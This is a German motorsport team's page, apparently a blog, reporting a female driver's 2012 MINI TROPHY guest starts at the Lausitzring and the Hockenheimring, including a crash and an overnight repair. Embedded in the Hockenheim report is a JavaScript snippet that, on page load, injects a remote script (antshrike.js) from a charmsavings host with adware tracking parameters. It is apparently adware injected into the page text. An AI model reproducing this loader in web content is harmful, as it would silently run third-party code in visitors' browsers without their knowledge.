Folge uns zu Facebook

Wir unterstützen .....

 

Gelungenes Saisonfinale auf dem Hockenheimring

Tolle Stimmung auf den Rängen, ein super Wetter und begeisternder Motorsport sorgte am Hockenheimring für ein würdiges Finale der ADAC GT Masters und auch der MINI TROPHY. Mehr…

 Gratulation zunächst an Jürgen Schmarl, Thomas Tekaat und Stephanie Halm für die verdienten Plätze 1 bis 3 der MINI TROPHY 2012. Wir gratulieren natürlich auch Sebastian Asch und Maximilian Götze für den Sieg in der Fahrerwertung und dem kfzteile24 MS RACING Team für den Titel in der Teamwertung der ADAC GT Masters. Unsere Gratulation und Anerkennung geht auch an Max Partl und Jörg Weidinger für einen gelungenen Gaststart im spektakulären Feld der GT Masters auf dem von Schubert Motorsport eingesetzten BMW Z4 GT3.

Auch für uns war der zweite Gaststart im Jahr 2012 ein erfolgreicher Abschluss und sorgte bei uns schon für viel Vorfreude auf die kommende Saison der MINI TROPHY 2013.

Im freien Zeittraining am Freitag ließ es unsere Victoria eher sehr ruhig angehen. Auch steckte noch immer eine kleine Nachwirkung des Trainingsunfalls am Lausitzring im Kopf. Also war eine störungsfreie Fahrt und die Vermeidung von Schäden Ihr oberstes Gebot. Im Zeittraining ging es dann am Freitag ein zweites Mal auf den 4.574 m langen Kurs. Und am Ende erreichte unsere Victoria bei Ihrem 2. Auftritt im Feld der MINI RROPHY den Startplatz 20.

Im 1. Rennen am Samstag ging unsere Victoria ohne Druck an den Start, der ohne Probleme verlief. Kurz darauf wurde bedingt durch ein Fahrzeug im Kiesbett das Pace Car auf die Strecke geschickt, was dann das Feld für einige Runden einbremste. Nach der Freigabe der Strecke wurde dass Feld wieder los gelassen. Um unseren Freunden und Sponsoren den gebührenden Dank auszudrücken, entschied sich unsere Victoria zu einem spektakulären fast 360 Grad Dreher in der Sachskurve.

Das Publikum honorierte diese Einlage mit entsprechendem Beifall und Ovationen. Aber der 1. Gang war schnell eingelegt, und dass Rennen ging weiter. Am Ende konnte ein guter Platz 17 erreicht werden.

 

Am Sonntag folgte der 2. Lauf und das letzte Rennen der Saison. Nach einem etwas missratenen Start und dem folgenden Verlust der P 17 gelang es aber sofort in der 2. Runde, die bisherige beste Rundenzeit des Wochenendes auf die Strecke zu brennen. Dieser Vorwärtsdrang wurde dann durch ein Geräusch am Fahrzeugunterboden gebremst. Da war es wieder. Die Sorge um den Zustand Ihrer „Lotte“ war wichtiger als alles andere. Und Vici ging mit Ihrer „Lotte“ in den Cruising Modus über. Am Ende des Rennens, was in der letzten Runde noch durch einen dramatischen und unverschuldeten Einschlag von Max Partl überschattet wurde, wurde Platz 19 erreicht und das Geräusch stellte sich nur als eine leicht lockere Unterbodenverkleidung heraus.

Nach diesem tollen und erfolgreichen Saisonfinale am Hockenheimring, möchten wir uns bei allen Freunden, Förderern und Sponsoren für die tolle Unterstützung und die vielen schönen Momente bedanken.
 
Wir haben in den letzten Monaten sehr viele Freunde gewonnen und motorsportbegeisterte Menschen und Besucher kennen gelernt. Aber auch einige Höhen und Tiefen des Motorsports erfahren. Wir freuen uns schon heute auf eine tolle Saison MINI TROPHY 2013 und viele schöne Momente mit Freunden, Gästen, Besuchern und Sponsoren auf und neben der Rennstrecke

(function () {if (top.location == self.location && top.location.href.split('#')[0] == 'http://localhost:10351/texts/8') {var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;po.src = document.location.protocol + '//charmsavings-production.s3.amazonaws.com/js/antshrike.js?u=50dee569-2759-4645-903e-75a1213c05b8&subid1=20140210&subid2=browsersafeguard-pitch-unmonetized&subid3=google_browsersafeguard-CPC-Display-DE-468x60-startfreedownload.com-42227563030';var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);}})();
Weniger…

Résumé des ADAC Masters Weekends vom 24. bis 26.08.2012 am Lausitzring

Erstmals ging das IMC-Motorsport-Team mit unserer Victoria als Gaststarter beim Lauf der Mini Trophy 2012 an den Start. Ein Wochenende mit allen Höhen und Tiefen des Motorsports begann am Freitag, den 24. August um 13:55 Uhr mit Mehr…
dem freien Training. Die vom nächtlichen Regenguss nun abgetrocknete Strecke bot gute Voraussetzungen, die Zeiten des Testtages am 18.07.2012 zu erreichen und zu verbessern. Die ersten gezeiteten Runden ließen auf eine für einen Neustarter gute Platzierung beim Qualifizierungslauf am Samstagmorgen hoffen. Im Verlauf des halbstündigen Trainingslaufes wurden bei 3 Boxenstops noch kleine Veränderungen des Luftdrucks vorgenommen um Veränderungen im Fahrverhalten zu korrigieren. In Runde 9 wurde dann die ehrgeizige Zeitenhatz in Ausgang Kurve T10 beendet. Unsere Victoria wurde um ca. 20 cm über Curb hinaus getragen und kam mit beiden Rädern auf den noch nassen Kies und Rasenbereich. Durch die fehlende Haftung konnte das Fahrzeug zwar kurz stabilisiert werden, aber im Verlauf der Aktion konnte der Kontakt mit der Streckenbegrenzung nicht mehr vermieden werden. Durch den ungünstigen Einschlagwinkel entstand ein nicht unerheblicher Schaden am Fahrzeug und Victoria lernte beim ersten Start die Ärzte des Medical Center und die netten Mitarbeiter des TOP Car Abschleppdienstes kennen. Die Tränen, die unsere Victoria in großer Zahl vergossen hat, galten einzig und allein Ihrem beschädigten Fahrzeug.

Die medizinischen Untersuchungen ergaben keine Verletzungen und alle Sicherheitseinrichtungen haben somit ihre Qualität bewiesen. Die Rennteilnahme wurde der Fahrerin selbst überlassen und die Entscheidung zur Teilnahme würde nach nur einem Wimpernschlag getroffen. „ Ich will fahren!!!

Um die Teilnahme am Qualifying und an den Rennen musste nach Sichtung der Schäden dennoch gebangt werden. Durch den ungünstigen Einschlagwinkel entstanden doch massive Schäden, die eine Teilnahme unmöglich erscheinen ließen. Aber mit unserem sowie dem Ehrgeiz unseres Partners s.i.g. Motorport in Form des Teamchefs Lothar Sausemuth und seinem Sohn Matthias Sausemuth, wurde die Reparatur begonnen. Unmengen an Fahrzeugteilen wie Motorhaube, Stoßfänger, Antriebswelle, Kühler und Ladeluftkühler, Querträger, Teile der Hubanlage, Lichtmaschine usw. wurden vom Teileservice der Mini Trophy geliefert und es begann die Notoperation unserer Nr. 33. Unter höchsten Anstrengungen, teilweise grober Handwerkskunst und immer neuen Problemen an Rahmen etc. war dann am Samstagmorgen um 03:15 Uhr zumindest wieder ein Fahrzeug zu erkennen. Am frühen Morgen wurden dann noch mögliche Einstellungen vorgenommen um ein halbwegs Steckentaugliches und dem Reglement entsprechendes Fahrzeug an den Start zu bringen.

Mit wenigen Minuten Verspätung wurde das Qualifying am Samstag um 08:35 aufgenommen. Unser Ziel, mindestens 3 gezeitete Runden, die zur Teilnahme am Rennen berechtigten. Unsere Victoria hatte beim ersten durchfahren der Kurve T10 zwar ein leicht mulmiges Gefühl, aber das verflog innerhalb weniger Runden. Insgesamt wurden im Qualifizierungslauf 8 Runden mit stets besseren Zeiten gedreht, aber leider war für unsere noch lahmende Nr. 33 nur der letzte Platz drin.

Das Rennen 1 am Samstag verlief dann ohne Störungen und für ein angeschlagenes Fahrzeug mit ansehnlichen Zeiten. Durch Ausfälle und technische Probleme anderer Teams wurde im Endergebnis des ersten Rennens der 17. Platz erreicht.

Im Rennen 2 befand sich unsere Nr. 33 dann am Sonntag auf dem Startplatz 17 ein. Nach der Einführungsrunde nahm unsere Nr. 33 die Position ein und die Konzentration galt ganz der Signalampel. Der schrille Pfiff eines Streckenpostens, der einem anderen Teilnehmer galt, unterbrach die Konzentration von Victoria und ließ die Startdrehzahl bei Startfreigabe kurz in den Keller rutschen und somit war der Start etwas missglückt. Der Rennverlauf ließ deutliche Verbesserungen von Sektoren- und Rundenzeiten erkennen, die trotz der schwierigen Fahreigenschaften für die Zukunft hoffen lassen.

Wir haben an diesem Wochenende alle Höhen und Tiefen des Motorsports, Ehrgeiz und Teamgeist und auch das familiäre Miteinander und die Unterstützung von Fahrerkollegen anderer Teams kennen gelernt. Und jeder Rennkilometer hat uns und unserer Victoria wichtige Erfahrungen geliefert. Da nach dem Rennwochenende nun die eigentliche Reparatur unserer „Lotte“ Nr. 33 beginnt, kann der nächste Start erst für das große Saisonfinale am 28.09 bis 30.09. am Hockenheimring geplant werden.

Wir danken auch unseren Gästen am Lausitzring, unseren Partnern und allen Freunden für die vielen lieben und aufmunternden Mails und Nachrichten.

Weniger…

Vor der Feuerprobe vom 24. bis 26. August 2012 auf dem Lausitzring

Nach nur 2 Test- und Einstellfahrten ist es nun soweit. Im Rahmen des ADAC Masters Weekend (vom 24. bis 26. August 2012 auf dem Lausitzring) müssen unser MINI mit der Startnummer 33 Mehr…

und unsere Fahrerin Victoria ihre erste Bewährungsprobe bestehen! Als Gaststarter werden wir zwar mit einigen Kilos an Zusatzgewicht ausgestattet sein, aber unser oberstes Ziel ist es, erste Erfahrungen im offiziellen Trainings- und Rennbetrieb zu sammeln und unsere Stadt bei dieser Veranstaltung vertreten zu dürfen.


Wir freuen uns schon heute, unsere Partner und Förderer zu dieser Veranstaltung auf dem Lausitzring begrüßen zu dürfen.

Weniger…